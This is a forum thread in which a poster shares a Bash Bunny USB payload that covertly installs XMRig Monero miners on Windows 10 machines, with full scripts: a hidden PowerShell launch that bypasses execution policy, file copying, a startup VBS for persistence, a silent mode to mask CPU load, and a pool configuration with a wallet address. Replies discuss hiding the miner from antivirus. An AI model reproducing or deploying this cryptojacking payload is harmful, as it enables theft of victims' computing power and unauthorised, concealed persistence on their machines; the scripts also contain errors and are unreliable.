icarus255 Posted October 3, 2018 Share Posted October 3, 2018 My first payload for the BB ? I just wanted to start off by saying that I don’t have a background in IT, I’m just an enthusiast. I did this really just to get more familiar with scripting and security, so I welcome any comments/criticisms. I should note that Ar1k88 posted mining payloads sometime ago so creds to him for the original idea. I ended up writing my own scripts rather than editing his ones and made some improvements e.g. combining the CPU and GPU miners into one payload, adding persistence, silent mode, etc. Some notes below if you care: Silent Mode You can set the miners to run in the background by editing the startup.vbs script and change “1” to “0” on line 3 & 4 or change the .json config file line 11 from “false” to “true”. The CPU usage is also editable in the config file so you can set it to a lower value and avoid visibly slowing down the host’s performance (at the expense of the hash rate). Once you execute the GPU miner, the computer will become almost non-responsive so definitely noticeable. Persistence I liked the idea of a VB script that runs on every startup which then subsequently initiates the miners. Windows of course didn’t like the idea of running scripts (I don’t know if this is a default security setting) but adding the vbs file as an exception to the execution policy seems to have fixed that (reference line 16 of run.ps1). Instructions You will need to download the xmrig binaries (or compile from source). Your browser and/or AV will most likely try to block the downloads. Windows Defender doesn't seem to mind though. https://github.com/xmrig/xmrig/releases https://github.com/xmrig/xmrig-nvidia (sorry I forgot to add AMD support but it’s getting late and I have work tomorrow) Copy the downloaded exe files (xmrig.exe and xmrig-nvidia.exe) and the following files into switch 2 folder in BB: payload.txt # Title: Silent Monero Miner (with persistence) # Description: Monero CPU miner (https://github.com/xmrig), copies the miner and config files to local disk, and adds a script to startup # Author: icarus255 # Props: 0dyss3us (KeenanV) - I like his idea of adding the VB script to startup # Version: 1.0 # Category: Mining # Target: Windows 10 # Attackmodes: HID, Storage # Comments: You will need to download the binaries from (https://github.com/xmrig/) or compile from source # Silent mode: You can start in silent mode (background) by changing config.json line 16: "background": false, -> "background": true, #Setup LED SETUP ATTACKMODE HID STORAGE GET SWITCH_POSITION #Wait for drive recognition Q delay 4500 #Run the Powershell script starts the miners, copies the files to local disk, and adds to startup. LED ATTACK RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" LED FINISH run.ps1 $Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name $user= $env:UserName $cpuminer = $Drive + "payloads\switch2\xmrig.exe" $configfile = $Drive + "payloads\switch2\config.json" $startupscript = $Drive + "payloads\switch2\startup.vbs" $nvidiaminer = $Drive + "payloads\switch2\xmrig-nvidia.exe" $StartupFolder = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup") $LocalFolder = ("C:\MoneroTest") Set-Location -Path $Drive + "payloads\switch2" copy-item -Path $cpuminer -Destination (new-item -type directory $LocalFolder) -force -ea 0 copy-item $configfile -Destination $LocalFolder copy-item $nvidiaminer -Deistnation $LocalFolder copy-item $startupscript -Destination $StartupFolder Unblock-File -Path $StartupFolder + "startup.vbs" Set-Location -Path $StartupFolder Start-Process cmd -ArgumentList "/c start startup.vbs" config.json { "algo": "cryptonight", "api": { "port": 0, "access-token": null, "worker-id": null, "ipv6": false, "restricted": true }, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 5, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 75, "pools": [ { "url": "pool.minexmr.com:4444", "user": "424MefYkUWB16pj42Fcsu1DVeGyywsoeY96oQkLcokoKSU2WyywLNdRXj2ms7y2JQk7c4QpTtsxZsdspHbWiwzc91rbBCjL", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": 1 } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": null, "user-agent": null, "watch": false } startup.vbs Dim WshShell Set WshShell = WScript.CreateObject("WScript.shell") WshShell.Run "powershell.exe C:\MoneroTest\xmrig.exe", 1, False WshShell.Run "powershell.exe C:\MoneroTest\xmrig-nvidia.exe", 1, False Link to comment Share on other sites More sharing options...
MrMyFriend Posted January 16, 2019 Share Posted January 16, 2019 Hi Icarus! Some time ago while i was giving a look to Ar1k88 payload I had your same idea! I’m also just an IT enthusiast, with a completed unrelated job to this environment, but I find your payload very interesting. Congrats! I can’t wait to have some free time to check it out. Link to comment Share on other sites More sharing options...
9ShadesLeft Posted January 17, 2019 Share Posted January 17, 2019 For those of us (me) who are new to this stuff. What is a CPU / GPU miner? I would assume for something either for Zombifying a PC or Bitcoin mining? Beyond that, I have no clue! Thank you for dealing with my being nieve! Link to comment Share on other sites More sharing options...
icarus255 Posted February 16, 2019 Author Share Posted February 16, 2019 On 1/17/2019 at 1:42 PM, 9ShadesLeft said: For those of us (me) who are new to this stuff. What is a CPU / GPU miner? I would assume for something either for Zombifying a PC or Bitcoin mining? Beyond that, I have no clue! Thank you for dealing with my being nieve! Mining can refer to any sort of crypto mining but in this instance we are mining Monero. Monero is a good choice because it's impossible to trace (or so they say) and you can mine it with a CPU. I wrote this for fun and when crypto mining was the cool thing to do. I would still like to figure out how to crypt the miner so the AV doesn't pick it up but don't hold you breath for that one 😉 Link to comment Share on other sites More sharing options...
MrMyFriend Posted February 18, 2019 Share Posted February 18, 2019 I was kind of busy in the last period, but still looking forward giving this a try at the end of this or next week. Making the miner AV undetectable will be definitely the next thing to do Link to comment Share on other sites More sharing options...
icarus255 Posted February 18, 2019 Author Share Posted February 18, 2019 5 minutes ago, MrMyFriend said: I was kind of busy in the last period, but still looking forward giving this a try at the end of this or next week. Making the miner AV undetectable will be definitely the next thing to do Yea that has always been an end goal for this little project but crypting miners is a big step from writing simple startup scripts. I looked into this a while back and I had some general ideas on how to approach it but not sure if my coding skills are up to the challenge. Fuck it, you have inspired me. I'm just going to no-life this for a month or so. What's the worst that could happen? 🙂 Link to comment Share on other sites More sharing options...
spamman63 Posted April 16, 2019 Share Posted April 16, 2019 I've been testing the script on my PC and it seems to get jammed when it tries to open startup.vbs, giving the message "Windows cannot find 'startup.vbs'. Make sure you typed the name correctly, and then try again." Send help Link to comment Share on other sites More sharing options...
Jack823933 Posted August 27, 2021 Share Posted August 27, 2021 On 2/18/2019 at 9:39 AM, icarus255 said: Yea that has always been an end goal for this little project but crypting miners is a big step from writing simple startup scripts. I looked into this a while back and I had some general ideas on how to approach it but not sure if my coding skills are up to the challenge. Fuck it, you have inspired me. I'm just going to no-life this for a month or so. What's the worst that could happen? 🙂 still waiting for it bro 😢 Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.